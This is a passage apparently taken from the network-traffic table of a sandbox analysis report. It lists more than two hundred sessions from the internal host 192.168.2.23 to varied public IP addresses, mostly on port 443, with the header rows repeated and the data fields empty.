                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11488192.168.2.2353514213.66.21.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11489192.168.2.2347974207.131.31.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11490192.168.2.2344624213.254.80.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11491192.168.2.2360880217.174.72.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11492192.168.2.2354316149.74.204.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11493192.168.2.2357222184.72.157.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11494192.168.2.2347796112.182.63.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11495192.168.2.2356950106.142.29.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11496192.168.2.2336032146.21.11.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11497192.168.2.234773632.172.149.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11498192.168.2.2342872197.207.230.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11499192.168.2.2345188202.217.172.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11500192.168.2.2354760111.179.28.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11501192.168.2.235934671.178.195.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11502192.168.2.2340146146.145.242.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11503192.168.2.235324075.180.229.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11504192.168.2.234298085.121.46.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11505192.168.2.234061837.132.167.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11506192.168.2.233977276.65.14.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11507192.168.2.2346018174.209.32.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11508192.168.2.2337072121.218.77.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11509192.168.2.2332984109.225.58.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11510192.168.2.234097838.206.15.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11511192.168.2.235576277.161.154.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11512192.168.2.235591694.108.103.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11513192.168.2.2360734159.137.125.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11514192.168.2.235488417.122.170.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11515192.168.2.234616635.48.212.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11516192.168.2.2334504150.33.167.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11517192.168.2.234169041.244.15.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11518192.168.2.2348272177.223.181.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11519192.168.2.2340506161.69.61.668080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11520192.168.2.234670244.71.228.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11521192.168.2.2358844191.37.37.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11522192.168.2.2360526105.214.195.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11523192.168.2.2342526148.5.255.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11524192.168.2.234656257.119.81.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11525192.168.2.2336360171.206.4.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11526192.168.2.2338216113.162.139.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11527192.168.2.2334406156.70.5.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11528192.168.2.2333472137.190.10.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11529192.168.2.2340492102.91.248.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11530192.168.2.2340802132.232.50.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11531192.168.2.2351022177.132.162.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11532192.168.2.2333010141.248.40.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11533192.168.2.2337938140.63.46.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11534192.168.2.2337138103.71.83.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11535192.168.2.2355786131.175.35.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11536192.168.2.2340876135.17.166.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11537192.168.2.2334786201.233.90.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11538192.168.2.2352786158.193.139.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11539192.168.2.234091658.101.192.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11540192.168.2.2344944125.34.100.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11541192.168.2.2333616194.43.167.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11542192.168.2.2333170161.234.75.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11543192.168.2.2350236171.253.136.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11544192.168.2.2335126147.36.194.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11545192.168.2.2334648112.12.156.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11546192.168.2.2345732184.37.100.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11547192.168.2.2359610200.53.27.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11548192.168.2.2351636157.55.126.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11549192.168.2.2339742106.90.109.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11550192.168.2.2360912171.210.148.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11551192.168.2.235588667.175.241.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11552192.168.2.235913450.4.133.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11553192.168.2.234753818.244.178.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11554192.168.2.2355540139.86.70.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11555192.168.2.2339644130.11.148.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11556192.168.2.2338632185.255.47.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11557192.168.2.235236863.238.87.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11558192.168.2.2338418126.243.223.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11559192.168.2.236011862.42.18.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11560192.168.2.233337874.143.216.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11561192.168.2.233610254.234.208.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11562192.168.2.235140279.126.139.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11563192.168.2.2342486170.0.217.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11564192.168.2.2343692122.237.11.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11565192.168.2.235046814.124.245.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11566192.168.2.2357560114.30.169.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11567192.168.2.2335954133.175.222.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11568192.168.2.2348020108.174.229.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11569192.168.2.234239464.236.184.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11570192.168.2.235243271.177.161.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11571192.168.2.234905643.131.125.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11572192.168.2.2351896161.61.150.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11573192.168.2.2335200131.238.61.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11574192.168.2.233989236.93.175.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11575192.168.2.2337620167.245.53.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11576192.168.2.235830885.97.76.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11577192.168.2.2345154221.210.97.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11578192.168.2.2360372207.148.23.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11579192.168.2.2336920128.96.21.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11580192.168.2.233899457.227.156.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11581192.168.2.2348832208.55.35.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11582192.168.2.234173657.103.2.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11583192.168.2.2335002149.127.97.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11584192.168.2.233342850.249.238.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11585192.168.2.234337231.240.126.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11586192.168.2.2355716212.213.251.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11587192.168.2.2350552154.116.220.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11588192.168.2.2334470124.248.80.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11589192.168.2.234834634.217.18.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11590192.168.2.235174067.20.195.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11591192.168.2.2339144125.189.194.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11592192.168.2.2360582108.178.26.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11593192.168.2.2351322195.153.202.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11594192.168.2.233373423.116.218.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11595192.168.2.2344584135.64.138.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11596192.168.2.2350770207.219.252.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11597192.168.2.2342028148.148.196.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11598192.168.2.2347328152.58.132.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11599192.168.2.233767264.179.151.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11600192.168.2.2350208156.74.8.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11601192.168.2.2345440165.82.69.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11602192.168.2.2336938212.164.69.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11603192.168.2.235365452.158.99.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11604192.168.2.2333740166.108.142.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11605192.168.2.233981652.116.243.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11606192.168.2.2342968133.190.221.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11607192.168.2.2337926205.191.113.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11608192.168.2.2338980128.156.119.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11609192.168.2.236051436.115.162.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11610192.168.2.2354242134.162.91.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11611192.168.2.2342766207.77.131.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11612192.168.2.2346840136.77.188.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11613192.168.2.234063286.179.57.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11614192.168.2.2339824141.140.46.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11615192.168.2.2348146209.65.33.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11616192.168.2.234491663.18.215.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11617192.168.2.235903413.144.13.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11618192.168.2.2337174196.128.126.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11619192.168.2.2338316128.141.246.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11620192.168.2.235043250.110.24.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11621192.168.2.235354482.66.111.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11622192.168.2.2348670169.43.11.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11623192.168.2.233589413.67.90.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11624192.168.2.234012482.117.122.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11625192.168.2.233860835.120.63.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11626192.168.2.234960675.72.235.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11627192.168.2.2338372168.225.113.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11628192.168.2.234503257.192.120.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11629192.168.2.2351674196.107.116.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11630192.168.2.234981262.157.64.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11631192.168.2.2339896207.165.51.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11632192.168.2.2334464178.133.37.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11633192.168.2.2339346145.216.100.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11634192.168.2.233688861.247.237.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11635192.168.2.2335266152.55.129.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11636192.168.2.2342346150.177.37.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11637192.168.2.235068294.161.166.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11638192.168.2.2343948221.245.238.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11639192.168.2.234962664.242.241.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11640192.168.2.233763247.220.221.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11641192.168.2.2355256103.202.150.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11642192.168.2.2343584113.196.66.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11643192.168.2.2334172131.31.73.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11644192.168.2.2334484115.210.122.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11645192.168.2.2358462189.191.234.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11646192.168.2.2343180205.38.164.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11647192.168.2.2356594197.63.29.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11648192.168.2.2342086189.80.204.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11649192.168.2.234514053.79.93.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11650192.168.2.2353532178.50.166.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11651192.168.2.2341358177.31.246.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11652192.168.2.234585074.49.197.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11653192.168.2.23372262.65.27.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11654192.168.2.2333834183.243.223.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11655192.168.2.2346162152.73.86.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11656192.168.2.2337684165.184.148.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11657192.168.2.235645877.74.114.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11658192.168.2.2359844191.160.184.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11659192.168.2.234011289.221.139.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11660192.168.2.2360308191.204.204.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11661192.168.2.234108650.234.90.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11662192.168.2.235865449.133.25.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11663192.168.2.233575493.91.101.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11664192.168.2.235148890.185.2.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11665192.168.2.2334060181.186.244.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11666192.168.2.2333556218.152.208.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11667192.168.2.236087214.58.243.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11668192.168.2.234017488.238.91.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11669192.168.2.2352560221.180.249.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11670192.168.2.2353016176.240.204.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11671192.168.2.234677640.59.138.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11672192.168.2.235106625.112.160.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11673192.168.2.2336620187.95.214.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11674192.168.2.2346892206.240.65.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11675192.168.2.233418699.91.34.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11676192.168.2.2356476164.117.32.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11677192.168.2.2340742220.147.92.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11678192.168.2.2333132148.47.40.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11679192.168.2.2335024141.109.201.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11680192.168.2.234897620.15.141.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11681192.168.2.2345560105.130.178.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11682192.168.2.2348592183.114.6.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11683192.168.2.235363475.154.196.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11684192.168.2.2336114176.146.135.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11685192.168.2.2337798102.220.36.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11686192.168.2.236033470.30.159.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11687192.168.2.233510453.134.62.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11688192.168.2.2357950185.79.76.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11689192.168.2.2356286180.152.36.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11690192.168.2.2351928141.15.195.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11691192.168.2.236017249.233.94.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11692192.168.2.2357548213.197.107.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11693192.168.2.2346542190.158.192.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11694192.168.2.2349542195.184.244.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11695192.168.2.234168862.163.235.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11696192.168.2.2350946136.110.18.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11697192.168.2.2343538221.174.245.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11698192.168.2.235927081.241.164.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11699192.168.2.2348360112.224.223.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11700192.168.2.2356626163.246.157.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11701192.168.2.235060464.114.178.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11702192.168.2.2359580196.93.179.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11703192.168.2.235492050.169.120.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11704192.168.2.234730277.138.64.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11705192.168.2.2334564123.78.28.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11706192.168.2.2348406129.223.201.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11707192.168.2.235998699.57.231.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11708192.168.2.233337045.63.92.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
